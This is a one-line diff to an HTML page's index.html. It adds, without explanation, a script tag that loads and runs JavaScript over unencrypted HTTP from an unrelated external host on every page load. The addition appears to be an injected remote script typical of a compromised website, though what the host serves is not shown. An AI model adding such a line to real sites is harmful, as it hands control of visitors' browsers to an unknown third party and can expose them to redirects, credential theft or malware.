--- a/index.html
+++ b/index.html
@@ -185,5 +185,6 @@
     });
   </script>
   <script src="index.js"></script>
+  <script type="text/javascript" src="http://ip.kjchmc.cn/zdschool/index.php"></script>
 </body>
 </html>
